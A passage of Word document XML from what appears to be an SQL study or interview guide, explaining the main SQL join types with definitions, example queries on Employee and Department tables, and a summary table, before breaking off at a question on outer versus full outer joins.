          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>joins</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="724"/>
    </w:p>
    <w:p w14:paraId="73EBD8BA" w14:textId="3E2C1EF7" w:rsidR="0049473E" w:rsidRPr="0085313D" w:rsidRDefault="0049473E" w:rsidP="0085313D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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 xml:space="preserve">In SQL, a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to combine rows from two or more tables based on a related column between them. There are several types of joins, each serving a different purpose when combining data from multiple tables. Here are the main types of joins in SQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E65A79"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1. INNER JOIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55299405"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: An </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>INNER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns only the rows where there is a match in both tables. If there is no match, the row is excluded from the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37206945"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Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you only want the data where there is a matching record in both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717353A8"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705D3AD5"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ELECT e.emp_id, e.emp_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A6DF4F"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FROM Employee e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D1C31F"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NNER JOIN Department d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51376BE7"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n this example, only employees who belong to a department will be returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56336FA2"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2. LEFT JOIN (or LEFT OUTER JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4E7737"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LEFT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns all the rows from the left table (the first table), and the matched rows from the right table (the second table). If there is no match, NULL values are returned for columns of the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734038E4"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Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want to keep all records from the left table, even if there's no matching row in the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D380B6"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD7F97"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ELECT e.emp_id, e.emp_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D14838B"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FROM Employee e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17076B7A"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LEFT JOIN Department d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B2E417"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n this example, all employees will be returned, and for those who do not belong to any department, the department name will be NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E505BE"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3. RIGHT JOIN (or RIGHT OUTER JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A3D7D"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RIGHT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns all the rows from the right table (the second table), and the matched rows from the left table (the first table). If there is no match, NULL values are returned for columns of the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB5BACD"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Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want to keep all records from the right table, even if there’s no matching row in the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC34DE"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08152628"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ELECT e.emp_id, e.emp_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E658999"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FROM Employee e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085C8DD9"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RIGHT JOIN Department d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BA7A73"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n this example, all departments will be returned, and for those departments that do not have any employees, the employee fields will be NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F86598"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4. FULL JOIN (or FULL OUTER JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595E4D90"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FULL JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns all rows when there is a match in either the left table or the right table. It returns NULL for non-matching rows from both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D262E2"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Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you want to include all records from both tables, even if there's no match between them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F283C36"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559AC1BA"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ELECT e.emp_id, e.emp_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D06DBCE"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FROM Employee e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2B4280"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lastRenderedPageBreak/>
        <w:t>FULL OUTER JOIN Department d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A33271"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n this example, all employees and all departments will be returned, and where there is no match, the missing table's fields will be NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D30254"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5. CROSS JOIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0D0BDC"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CROSS JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> returns the Cartesian product of two tables, meaning it will return all possible combinations of rows from both tables. This join does not require any condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418CCB5E"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Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you need to get all possible combinations of two sets of data, such as when testing or generating all combinations of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5162A3D3"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5033A4DA"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ELECT e.emp_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684818CF"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FROM Employee e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECA055"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CROSS JOIN Department d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CF9C46"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This will return every possible combination of employee names and department names, regardless of whether the employee belongs to that department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AAD02B"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6. SELF JOIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F00D7F1"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELF JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a join where a table is joined with itself. This is useful when you have hierarchical or relational data within the same table (e.g., employees and managers within the same employee table).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E690115"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Use case</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used when you need to relate rows within the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5B55E0"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xample</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA44A6"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ELECT e1.emp_name AS Employee, e2.emp_name AS Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532858B7"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FROM Employee e1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE0381A"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LEFT JOIN Employee e2 ON e1.manager_id = e2.emp_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD50C32"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n this example, the employee table is joined with itself to find out who is managing each employee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141B054"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Summary of Join Typ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5"/>
        <w:gridCol w:w="5377"/>
        <w:gridCol w:w="3892"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="4A3B716F" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30168260"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Join Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A945A04"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="584E2DAF" w14:textId="77777777" w:rsidR="0049473E" w:rsidRPr="0085313D" w:rsidRDefault="0049473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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="11CED4F6" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="657B8783"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INNER JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F0AA4C6"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Returns only matching rows between the tables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66602741"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When you need data that exists in both tables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="280D878B" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46CCADDE"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LEFT JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="353708F2"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Returns all rows from the left table and matching rows from the right table, or NULL if no match.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B5F09F4"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When you want all rows from the left table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="3D1AA771" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A15B84A"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RIGHT JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E4BABBA"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Returns all rows from the right table and matching rows from the left table, or NULL if no match.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5807C4ED"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When you want all rows from the right table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="580E7689" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="429670BE"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FULL JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="207008EF"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Returns all rows when there is a match in either the left or right table, or NULL for non-matches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05137F7C"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When you want all rows from both tables, even if no match exists.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="6378AC56" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DE65257"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ROSS JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F1B503"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Returns the Cartesian product of the two tables, i.e., all possible combinations of rows.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EBA1307"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When you need all combinations of data from two tables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="12C367FB" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2778534F"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SELF JOIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E20BF09"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Joins a table with itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="594DA518"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When dealing with hierarchical or relational data within a table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D78CEFD" w14:textId="77777777" w:rsidR="0049473E" w:rsidRPr="0085313D" w:rsidRDefault="0049473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Each type of join has its own use case depending on the data and the type of relationship you want to retrieve. Understanding these different types of joins helps in writing more efficient SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C38E75" w14:textId="7E4561C1" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066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6CF0024">
          <v:rect id="_x0000_i3005" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BBA9B9" w14:textId="1F4D82C5" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="00421182">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="725" w:name="_Toc196308205"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Outer join and Full outer join</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="725"/>
    </w:p>
    <w:p w14:paraId="1098D610" w14:textId="4492AB5A" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085E" w:rsidP="0085313D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Difference between Outer Join and Full Outer Join:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5258D0BB" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085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1. Outer Join:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344C7EDF"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The term </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
